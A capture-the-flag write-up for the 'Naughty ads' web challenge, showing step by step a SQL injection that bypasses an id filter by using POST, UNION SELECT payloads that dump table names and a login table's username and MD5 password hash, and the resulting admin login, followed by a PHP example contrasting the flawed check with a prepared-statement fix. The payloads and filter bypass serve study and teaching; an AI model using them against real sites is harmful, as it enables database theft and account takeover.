Tags: sqli php
# ▼▼▼Naughty ads - Web (200 points)(122/500 teams=24.4%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
GET /robots.txt
↓
```
User-agent: *
Disallow: /admin
Disallow: /*.phps
```
GET /index.phps
↓
```
<HTML>
<HEAD>
<TITLE>NAUGHTY ADS c1994</TITLE>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>
Home
</CENTER>
</BODY>
</HTML>
<HTML>
<HEAD>
<TITLE>NAUGHTY ADS c1994</TITLE>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>
<map name="planetmap">
<area shape="rect" coords="287,93,523,261" href="?id=<?php echo array_pop($cols); ?>" alt="BDSM hookup">
<area shape="rect" coords="542,93,774,261" href="?id=<?php echo array_pop($cols); ?>" alt="Fat fetish">
<area shape="rect" coords="34,282,269,449" href="?id=<?php echo array_pop($cols); ?>" alt="Dirty mistress">
<area shape="rect" coords="292,282,521,449" href="?id=<?php echo array_pop($cols); ?>" alt="Femdom one night stand">
<area shape="rect" coords="545,282,777,449" href="?id=<?php echo array_pop($cols); ?>" alt="Waterboarding extasy">
<area shape="rect" coords="33,468,266,595" href="?id=<?php echo array_pop($cols); ?>" alt="Kinky nightmare">
<area shape="rect" coords="277,456,534,598" href="?id=<?php echo array_pop($cols); ?>" alt="Food fetish">
<area shape="rect" coords="547,466,780,599" href="?id=<?php echo array_pop($cols); ?>" alt="Whip experience">
<area shape="rect" coords="595,23,619,57" href="/admin" alt="Admin">
</map>
</CENTER>
</BODY>
</HTML>
```
↓
The filter checks `$_REQUEST['id']`, but the query uses `$_GET['id']` ⇒ **SQL injection**
↓
Use the **POST method** to bypass the filter.
↓
**POST** /index.php?id='UNION+select+group_concat(**table_name**)+from+information_schema.tables--+
↓
```
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,OPTIMIZER_TRACE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,INNODB_LOKS,INNODB_TRX,INNODB_SYS_DATAFILES,INNODB_FT_CONFIG,INNODB_SYS_VIRTUAL,INNODB_CMP,INNODB_FT_BEING_DELETED,INNODB_CMP_RESET,INNODB_CMP_PER_INDEX,INNODB_CMPMEM_RESET,INNODB_FT_DELETED,INNODB_BUFFER_PAGE_LRU,INNODB_LOCK_WAITS,INNODB_TEMP_TABLE_INFO,INNODB_SYS_INDEXES,INNODB_SYS_TABLES,INNODB_SYS_FIELDS,INNODB_CMP_PER_INDEX_RESET,INNODB_BUFFER_PAGE,INNODB_FT_DEFAULT_STOPWORD,INNODB_FT_INDEX_TABLE,INNODB_FT_INDEX_CACHE,INNODB_SYS_TABLESPACES,INNODB_METRICS,INNODB_SYS_FOREIGN_COLS,INNODB_CMPMEM,INNODB_BUFFER_POOL_STATS,INNODB_SYS_COLUMNS,INNODB_SYS_FOREIGN,INNODB_SYS_TABLESTATS,ads,login
```
POST /index.php?id='UNION+select+group_concat(**column_name**)+from+information_schema.columns+where+table_name='**login**'--+
↓
```
id,name,password
```
POST /index.php?id='UNION+select+group_concat(**name**)from+**login**--+
↓
```
webmasterofdoom3755
```
POST /index.php?id='UNION+select+group_concat(**password**)from+**login**--+
↓
```
5ebe2294ecd0e0f08eab7690d2a6ee69
```
↓ Google search
MD5(**secret**)
GET /admin/
↓
Enter the Basic Authentication credentials 「webmasterofdoom3755:secret」
↓
Enter his phone number, "**555-31338**"
↓
**SECT{~tr4nsv3stiT3s_w3lc0me_t00~}**
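
The `$_REQUEST`/`$_GET` mismatch used above, shown as a flawed lookup beside a hardened one. This is an added example, not the challenge's source: the filter, the `ads` table layout, the SQLite stand-in for MySQL and the request values are all assumptions, and it assumes the POST body carries its own `id` and that `request_order` is "GP".

```php
<?php
// Added illustration; not the challenge's index.php, whose PHP logic is not shown here.
// Constructed request: POST /index.php?id=<query value>, with a body that also sets id.
$_GET  = ['id' => "x' OR '1'='1"];  // query string (constructed)
$_POST = ['id' => 'a1'];            // request body (constructed)
// With request_order "GP", $_REQUEST is filled from GET, then POST, so POST wins.
$_REQUEST = array_merge($_GET, $_POST);

$db = new PDO('sqlite::memory:');   // in-memory stand-in for the site's MySQL
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE ads (id TEXT PRIMARY KEY, description TEXT)");
$db->exec("INSERT INTO ads VALUES ('a1', 'first ad'), ('b2', 'second ad')");

// Hypothetical filter: accept only short alphanumeric ids.
function is_clean($v): bool
{
    return is_string($v) && preg_match('/^[A-Za-z0-9]{1,16}\z/', $v) === 1;
}

// Flawed pattern: validate one superglobal, build the SQL from another.
function lookup_flawed(PDO $db): array
{
    if (!is_clean($_REQUEST['id'] ?? null)) {
        return [];
    }
    $sql = "SELECT description FROM ads WHERE id = '" . $_GET['id'] . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: read one source once, validate that value, then bind it.
function lookup_hardened(PDO $db): array
{
    $id = $_GET['id'] ?? null;
    if (!is_clean($id)) {
        return [];
    }
    $stmt = $db->prepare('SELECT description FROM ads WHERE id = ?');
    $stmt->execute([$id]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Rows returned for the same request by each version.
printf("flawed:   %d row(s)\n", count(lookup_flawed($db)));
printf("hardened: %d row(s)\n", count(lookup_hardened($db)));
```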